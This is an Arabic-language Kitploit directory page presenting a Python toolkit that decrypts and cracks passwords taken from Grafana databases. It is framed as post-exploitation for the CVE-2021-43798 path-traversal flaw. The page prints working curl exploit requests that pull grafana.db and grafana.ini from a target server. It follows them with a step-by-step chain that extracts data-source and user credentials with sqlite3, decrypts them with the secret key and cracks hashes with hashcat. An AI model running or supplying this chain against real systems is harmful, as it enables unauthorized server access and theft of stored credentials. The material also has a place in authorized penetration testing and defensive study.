Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Grafana-Password-Decryptor — مجموعة أدوات بايثون لفك تشفير AES-256 وكسر كلمات مرور PBKDF2 من قواعد بيانات Grafana، تُستخدم عادةً إلى جانب (CVE-2021-43798) | Kitploit
أدوات/GitHubGitHub/strikoder-premium/grafana-password-decryptor
كسر كلمات المرورأدوات التشفير/فك التشفيرتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالالتشفير
GitHubstrikoder-premium/grafana-password-decryptor

Grafana-Password-Decryptor

مجموعة أدوات بايثون لفك تشفير AES-256 وكسر كلمات مرور PBKDF2 من قواعد بيانات Grafana، تُستخدم عادةً إلى جانب (CVE-2021-43798)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

مفكك تشفير كلمات مرور Grafana

أداة Python لفك تشفير وكسر كلمات مرور Grafana من تنسيقات متعددة.

تمت البرمجة بواسطة: strikoder

ماذا تفعل هذه الأداة؟

تتعامل مع نوعين من تخزين كلمات مرور Grafana:

  • 🔐 AES-256 Base64 (جدول data_source) → فك التشفير مباشرة باستخدام AESDecrypt.py
  • 🔨 PBKDF2_HMAC_SHA256 (جدول user) → التحويل لـ Hashcat باستخدام grafana2hashcat.py

مثالي لمرحلة ما بعد الاستغلال بعد ثغرة اجتياز المسار CVE-2021-43798.

ما هي CVE-2021-43798؟

ثغرة اجتياز المسار في إصدارات Grafana من 8.0.0-beta1 حتى 8.3.0 تتيح للمهاجمين غير المصادق عليهم قراءة ملفات عشوائية من الخادم، بما في ذلك:

  • ملفات التكوين (/etc/grafana/grafana.ini)
  • ملفات قاعدة البيانات (/var/lib/grafana/grafana.db)
  • ملفات النظام (/etc/passwd)

مثال على الاستغلال:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db

تكمل هذه الأداة سلسلة الهجوم عن طريق فك تشفير/كسر كلمات المرور التي تستخرجها من قاعدة البيانات.

الأدوات المضمنة

1. AESDecrypt.py

يفك تشفير كلمات المرور المشفرة بخوارزمية AES-256 من جدول data_source.

مبني على: jas502n/Grafana-CVE-2021-43798 مع تحسينات رئيسية:

  • ✅ مفتاح سري مرن: استخراج المفتاح يدويًا (بدون مسارات مكتوبة بشكل ثابت)
  • ✅ معالجة دفعات: فك تشفير عدة تجزئات (hashes) من ملف
  • ✅ قابل للتهيئة بالكامل: جميع المعلمات عبر خيارات سطر الأوامر

2. grafana2hashcat.py

يحوّل تجزئات Grafana PBKDF2_HMAC_SHA256 من جدول user إلى صيغة متوافقة مع Hashcat لكسر كلمات المرور.

الفضل: iamaldi/grafana2hashcat

التثبيت

root@kitploit:~
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.py

الاستخدام

الأداة 1: AESDecrypt.py (لكلمات مرور AES-256 Base64)

فك تشفير تجزئة واحدة

root@kitploit:~
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

فك تشفير عدة تجزئات

root@kitploit:~
python3 AESDecrypt.py -f hashes.txt

استخدام مفتاح سري مخصص

استخرج المفتاح السري من إعدادات Grafana:

root@kitploit:~
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key

python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY

الأداة 2: grafana2hashcat.py (لتجزئات PBKDF2)

تحويل ملف تجزئات واحد

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt

صيغة الإدخال (grafana_hashes.txt):

root@kitploit:~
hash1,salt1
hash2,salt2
hash3,salt3

الإخراج (جاهز لـ Hashcat):

root@kitploit:~
sha256:10000:base64_salt:base64_hash

الحفظ في ملف

root@kitploit:~
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

الكسر باستخدام Hashcat

root@kitploit:~
hashcat -m 10900 hashcat_hashes.txt wordlist.txt

مثال كامل للاستغلال

السيناريو 1: كلمات مرور مشفرة بـ AES (جدول data_source)

root@kitploit:~
# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key

# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"

# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]

السيناريو 2: تجزئات PBKDF2 (جدول user)

root@kitploit:~
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db

# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"

# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt

# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt

مرجع سريع: أي أداة يجب استخدامها؟

الاعتمادات

  • AESDecrypt.py: تمت برمجته بواسطة strikoder، استنادًا إلى تنفيذ jas502n بلغة Go
  • grafana2hashcat.py: أنشأه iamaldi

⭐ هل وجدت هذا مفيدًا؟ امنحه نجمة!

تمت البرمجة بواسطة strikoder

تنزيل الأداة
نوع كلمة المرورجدول قاعدة البياناتالصيغةالأداةوضع Hashcat
مشفرة بـ AES-256data_sourceسلسلة Base64AESDecrypt.pyغير متاح (فك تشفير مباشر)
PBKDF2_HMAC_SHA256userتجزئة Hex + saltgrafana2hashcat.py-m 10900